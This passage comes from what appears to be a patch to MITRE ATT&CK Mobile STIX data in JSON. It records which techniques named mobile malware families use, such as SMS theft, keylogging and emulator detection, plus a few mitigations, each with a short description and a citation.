Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:10:38.937Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can download the address book.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--15065492-1aef-4cf8-af3c-cc763eee5daf", + "created": "2020-09-24T15:34:51.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. 
Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:49:32.064Z", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) can detect if it is being ran on an emulator.(Citation: Lookout-Dendroid)", + "relationship_type": "uses", + "source_ref": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2341fdfa-9699-4798-a35a-2cc4f150cd14", + "type": "relationship", + "created": "2019-07-10T15:35:43.610Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-08-09T18:06:11.693Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) retrieves a list of all applications installed on the device.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3f31b209-dbc7-4c7e-bb0a-e37801121c13", + "created": "2020-10-29T17:48:27.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:45:26.765Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) has registered to receive the `BOOT_COMPLETED` broadcast intent.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f0a0005e-cc38-4f7a-ba49-21a4c48ae1a1", + "type": "relationship", + "created": "2020-07-15T20:20:59.284Z", + 
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.284Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can install attacker-specified components or applications.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--2bb20118-e6c0-41dc-a07c-283ea4dd0fb8", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a54c8c09-c849-4146-a7cc-158887222a6d", + "created": "2020-12-24T21:45:56.969Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:05.454Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access SMS messages.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5b5586b9-75ee-476f-b3eb-49878254302c", + "type": "relationship", + "created": "2019-07-16T14:33:12.117Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + } + ], + "modified": "2020-04-27T16:52:49.643Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) is able to modify code within the com.android.systemui application to gain access to `GET_REAL_TASKS` permissions. 
This permission enables access to information about applications currently on the foreground and other recently used apps.(Citation: Google Triada June 2019) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--119b848b-84b4-4f86-a265-0c9eb8680072", + "created": "2021-10-01T14:42:49.171Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can be controlled via IRC using freenode.net servers.(Citation: SecureList BusyGasper)", + "modified": "2022-04-18T19:01:58.546Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--939808a7-121d-467a-b028-4441ee8b7cee", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f88cbb0c-ca34-4a87-82fa-e0e567ee8d57", + "type": "relationship", + "created": "2020-04-08T15:51:25.120Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "url": 
"https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. Retrieved April 8, 2020." + } + ], + "modified": "2020-04-08T15:51:25.120Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) obfuscates its payload, code, and strings.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9cfcda7d-bb82-4122-a38b-fec4f5532856", + "created": "2020-05-04T14:04:56.211Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . 
Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:03:51.504Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) communicates with the C2 server using HTTP requests.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d300eb82-5ca0-48aa-a45f-d34242545e27", + "created": "2022-03-30T15:08:28.814Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Device attestation could detect unauthorized operating system modifications. 
", + "modified": "2022-03-30T15:08:28.814Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "target_ref": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--97417113-1840-4e00-98d3-bb222e1a1f60", + "type": "relationship", + "created": "2020-07-27T14:14:56.980Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-10T22:18:20.815Z", + "description": "[Zen](https://attack.mitre.org/software/S0494) base64 encodes one of the strings it searches for.(Citation: Google Security Zen)", + "relationship_type": "uses", + "source_ref": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3364dd33-c012-4aaf-852b-86e63bd724ac", + "created": "2023-02-06T19:38:22.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. 
Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + }, + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T22:06:53.022Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can gather session cookies from infected devices. [S.O.V.A.](https://attack.mitre.org/software/S1062) can also abuse Accessibility Services to steal Google Authenticator tokens.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--702055ac-4e54-4ae9-9527-e23a38e0b160", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7d481598-ece7-469c-b231-619a804c25e5", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Pegasus", + "description": "Lookout. (2016). Technical Analysis of Pegasus Spyware. 
Retrieved December 12, 2016.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:34:25.318Z", + "description": "[Pegasus for iOS](https://attack.mitre.org/software/S0289) captures SMS messages that the victim sends or receives.(Citation: Lookout-Pegasus)", + "relationship_type": "uses", + "source_ref": "malware--33d9d91d-aad9-49d5-a516-220ce101ac8a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--efd35b6f-7a61-4998-97ff-608547e40f66", + "created": "2019-10-01T14:23:44.054Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": " [Rotexy](https://attack.mitre.org/software/S0411) encrypts JSON HTTP payloads with AES.(Citation: securelist rotexy 2018) ", + "modified": "2022-04-18T16:07:57.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--51bf6ffc-85c7-4910-8821-9736a1ec60f1", + "created": "2019-09-04T15:38:57.037Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "url": "https://www.flexispy.com/en/features-overview.htm", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. Retrieved September 4, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can record keystrokes and analyze them for keywords.(Citation: FlexiSpy-Features)", + "modified": "2022-04-15T17:34:17.813Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1f44936e-b84c-404f-a92e-6fb7e24b5435", + "created": "2022-04-05T19:51:08.770Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android 12 Features", + "url": "https://developer.android.com/about/versions/12/features", + "description": "Google. (2022, April 4). Features and APIs Overview. Retrieved April 5, 2022." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "The `HIDE_OVERLAY_WINDOWS` permission was introduced in Android 12 allowing apps to hide overlay windows of type `TYPE_APPLICATION_OVERLAY` drawn by other apps with the `SYSTEM_ALERT_WINDOW` permission, preventing other applications from creating overlay windows on top of the current application.(Citation: Android 12 Features)", + "modified": "2022-04-05T19:51:08.770Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a503ca06-7f98-4ab4-a8fc-ff55c3da7f0a", + "created": "2020-10-29T19:21:23.143Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. 
Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:48:18.023Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) has registered to receive the `BOOT_COMPLETED` broadcast intent to activate on device startup.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--212801c2-5d14-4381-b25a-340cda11a5ac", + "created": "2020-12-18T20:14:47.310Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has displayed a form to collect user data after installation.(Citation: WhiteOps TERRACOTTA)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--68e5789c-9f60-421e-9c79-fae207a29e83", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. 
Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:20.839Z", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) stole SMS message content.(Citation: Kaspersky-WUC)", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--34f9aed0-48a7-4815-8456-5541a7b8210f", + "created": "2019-09-04T14:28:16.487Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Monokle](https://attack.mitre.org/software/S0407) can record the user's keystrokes.(Citation: Lookout-Monokle)", + "modified": "2022-04-15T17:34:52.414Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--24951cfe-d3ce-4802-86ff-028fc9cbbe53", + "type": "relationship", + "created": "2020-07-15T20:20:59.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. Retrieved July 15, 2020." + } + ], + "modified": "2020-07-15T20:20:59.318Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) uses foreground persistence to keep a service running. 
It shows the user a transparent notification to evade detection.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--648f8051-1a35-46d3-b1d8-3a3f5cf2cc8e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5aa167b8-4166-440b-b49f-bf1bab597237", + "created": "2019-11-21T16:42:48.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:39:13.309Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect the device’s call log.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--78fc4506-5c80-4638-8f51-44a2e28f7aaf", + "type": "relationship", + "created": "2020-09-11T15:43:49.309Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": 
"https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-09-11T15:43:49.309Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can send SMS messages from a device.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4449ac76-8329-4483-b152-99b990006cbc", + "created": "2019-09-04T15:38:56.937Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FlexiSpy-Features", + "description": "FlexiSpy. (n.d.). FlexiSpy Monitoring Features. 
Retrieved September 4, 2019.", + "url": "https://www.flexispy.com/en/features-overview.htm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:58:10.115Z", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) can collect a list of known Wi-Fi access points.(Citation: FlexiSpy-Features) ", + "relationship_type": "uses", + "source_ref": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9634001c-575b-47aa-acd2-c3b1e900bd0b", + "type": "relationship", + "created": "2020-12-17T20:15:22.397Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
